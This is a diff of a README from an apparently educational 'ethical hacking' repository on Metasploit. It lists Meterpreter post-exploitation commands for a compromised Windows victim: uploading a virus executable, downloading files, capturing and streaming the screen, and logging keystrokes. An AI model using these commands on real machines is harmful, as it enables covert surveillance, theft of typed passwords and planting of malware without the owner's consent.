swopnilshakya7/Taking-Control-Over-Windows-Machine-Metasploit-Ethical-Hacking/README.md

 <h4> Scopes for hackers | Consequences for victims </h4>

-1. View and upload files
+1. View and upload files</br>

     To view and surf through the machine and different directories.
-Popular commands are
+Popular commands are</br>

-    cd: change directory
+    cd: change directory</br>
-    ls: list the contents of that particular directory
+    ls: list the contents of that particular directory</br>
-    pwd: print working directory
+    pwd: print working directory</br>

-    To upload files in the victim machine, we can simply use the upload command upload /home/attacker/Desktop/virusnew.exe
+    To upload files in the victim machine, we can simply use the upload command</br>
+    upload /home/attacker/Desktop/virusnew.exe</br>

     This command will simply upload the virus.exe file from the attackers computer to the present working directory of the victim machine.
 Note that, attacker is the name of our attacker machine here in our example.

-2. Download files from the victims computer.
+2. Download files from the victims computer.</br>
     We can use download command to download a file from the victim machine.
 And cat command to open it.

 3. Viewing the screen
-    By doing the command:
+    By doing the command:</br>
-    screenshot -v true
+    screenshot -v true</br>
     screenshot of the current screen of the victim window can be taken.
 A popup will come in front.
-    Even we can continously watch the screen by the command: screenshare
+    Even we can continously watch the screen by the command:</br>
+    screenshare</br>
     a player will start and screen will get shared.

-4. Keystrokes logging
+4. Keystrokes logging</br>
-    To start recording the key strokes, the command is: keyscan_start
+    To start recording the key strokes, the command is:</br>
+    keyscan_start</br>
-    and to dump the recorded commands so far: keyscan_dump
+    and to dump the recorded commands so far:</br>
+    keyscan_dump</br>
     In the dump <cr> refers to carriage return or it is the enter key pressed.